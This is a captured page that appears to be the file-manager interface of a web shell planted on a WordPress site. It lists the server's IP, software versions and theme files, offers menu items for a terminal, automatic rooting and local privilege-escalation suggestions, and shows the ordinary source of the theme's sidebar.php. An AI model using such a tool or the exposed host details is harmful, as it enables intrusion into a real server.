Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cstage /
wp-content /
themes /
rock-studio /
Delete
Unzip
Name
Size
Permission
Date
Action
assets
[ DIR ]
drwxr-xr-x
2026-08-12 08:57
inc
[ DIR ]
drwxr-xr-x
2026-09-02 09:52
languages
[ DIR ]
drwxr-xr-x
2026-09-02 09:49
sections
[ DIR ]
drwxr-xr-x
2026-08-12 08:57
template-parts
[ DIR ]
drwxr-xr-x
2026-09-02 10:44
functions.php
10.87
KB
-rw-r--r--
2025-01-07 14:00
sidebar.php
539
B
-rw-r--r--
2025-01-07 14:00
Save
Rename
<?php /** * The sidebar containing the main widget area * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Rock Studio */ if ( ! is_active_sidebar( 'sidebar-1' ) ) { return; } ?> <?php $rock_studio_sidebar_layout = rock_studio_get_option('layout_options'); if ( 'no-sidebar' !== $rock_studio_sidebar_layout ) {?> <aside id="secondary" class="widget-area" role="complementary"> <?php dynamic_sidebar( 'sidebar-1' ); ?> </aside><!-- #secondary --> <?php } ?>